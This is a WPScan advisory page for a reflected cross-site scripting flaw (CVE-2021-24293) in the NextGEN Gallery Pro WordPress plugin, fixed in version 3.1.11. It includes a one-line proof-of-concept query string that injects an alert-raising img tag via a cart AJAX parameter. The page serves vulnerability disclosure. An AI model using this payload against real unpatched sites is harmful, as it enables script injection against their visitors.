WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)

Description

In the eCommerce module of NextGEN Gallery Pro, there is an action to call get_cart_items via photocrati_ajax , after that the settings[shipping_address][name] is able to inject malicious javascript.

Proof of Concept

On a page where a NextGEN (Pro) gallery is embed: ?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E

Affects Plugins

nextgen-gallery-pro
Fixed in version 3.1.11

References

CVE
CVE-2021-24293
URL
https://www.imagely.com/wordpress-gallery-plugin/nextgen-pro/changelog/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

mgthuramoemyint

Submitter

ThuraMoeMyint

Submitter twitter
mgthuramoemyint
Verified

Yes

WPVDB ID
5e1a4725-3d20-44b0-8a35-bbf4263957f7

Timeline

Publicly Published

2021-02-24 (about 2 years ago)

Added

2021-02-24 (about 2 years ago)

Last Updated

2021-04-29 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin